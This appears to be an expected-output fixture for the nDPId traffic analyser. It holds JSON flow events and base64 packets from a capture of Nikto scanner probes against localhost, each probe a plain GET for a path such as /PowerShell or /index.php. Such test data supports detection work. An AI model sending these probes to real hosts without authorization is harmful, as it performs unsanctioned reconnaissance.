-00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1576420276793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276793,"pkt":"AAAAAAAAAAAAAAAACABFAADD2QRAAEAGYy5\/AAABfwAAAcIwH5DBGuEtmiy9f4AYAED+twAAAQEICp1m+2GdZvthR0VUIC9hc3BuZXRfY2xpZW50IEhUVFAvMS4wDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1576420276794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276794,"pkt":"AAAAAAAAAAAAAAAACABFAADAoqZAAEAGmY9\/AAABfwAAAcIyH5C3W5qL6yWPx4AYAED+tAAAAQEICp1m+2KdZvtiR0VUIC9Qb3dlclNoZWxsIEhUVFAvMS4wDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KDQo="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1576420276796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1576420276796,"pkt":"AAAAAAAAAAAAAAAACABFAAC74FpAAEAGW+B\/AAABfwAAAcI0H5AdBth42VHy84AYAED+rwAAAQEICp1m+2SdZvtkR0VUIC4gSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBXZWJMb2dpYyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1576420276797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1576420276797,"pkt":"AAAAAAAAAAAAAAAACABFAADj87RAAEAGSF5\/AAABfwAAAcI2H5ABU8uetZ1IA4AYAED+1wAAAQEICp1m+2WdZvtlR0VUIC8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZGVmbGF0ZSwgZ3ppcA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IEJSRUFDSCBUZXN0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: BREACH Test)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7440000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1576420276801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":189,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":189,"pkt_l4_len":155,"thread_ts_msec":1576420276801,"pkt":"AAAAAAAAAAAAAAAACABFAACv4YVAAEAGWsF\/AAABfwAAAcI4H5Af9dm0Z318ZoAYAED+owAAAQEICp1m+2mdZvtpR0VUIC8gSFRUUC8xLjANCk5pa3RvOiAfDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6QFRFU1RJRCkNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7440000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1576420276803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276803,"pkt":"AAAAAAAAAAAAAAAACABFAADGlY9AAEAGpqB\/AAABfwAAAcI6H5C5Ma2+n2Qvb4AYAED+ugAAAQEICp1m+2udZvtrR0VUIC9pbmRleC5waHAgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1576420276804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276804,"pkt":"AAAAAAAAAAAAAAAACABFAADHUClAAEAG7AV\/AAABfwAAAcI8H5AXCWgXkPGhe4AYAED+uwAAAQEICp1m+2ydZvtsR0VUIC9pbmRleC5waHAzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1576420276806,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276806,"pkt":"AAAAAAAAAAAAAAAACABFAADHuG9AAEAGg79\/AAABfwAAAcI+H5DOCYBdLPnSzYAYAED+uwAAAQEICp1m+26dZvtuR0VUIC9pbmRleC5waHA0IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php4","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1576420276807,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276807,"pkt":"AAAAAAAAAAAAAAAACABFAADHnVlAAEAGntV\/AAABfwAAAcJAH5BrmKVmTh6XdYAYAED+uwAAAQEICp1m+2+dZvtvR0VUIC9pbmRleC5waHA1IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php5","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1576420276809,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276809,"pkt":"AAAAAAAAAAAAAAAACABFAADHz9VAAEAGbFl\/AAABfwAAAcJCH5Dtpvfi4owoVYAYAED+uwAAAQEICp1m+3GdZvtwR0VUIC9pbmRleC5waHA3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php7","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1576420276810,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276810,"pkt":"AAAAAAAAAAAAAAAACABFAADH5lRAAEAGVdp\/AAABfwAAAcJEH5B9+95hKQN6FIAYAED+uwAAAQEICp1m+3KdZvtyR0VUIC9pbmRleC5odG1sIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1576420276812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276812,"pkt":"AAAAAAAAAAAAAAAACABFAADGlhlAAEAGphZ\/AAABfwAAAcJGH5DYta4lttm384AYAED+ugAAAQEICp1m+3OdZvtzR0VUIC9pbmRleC5odG0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} 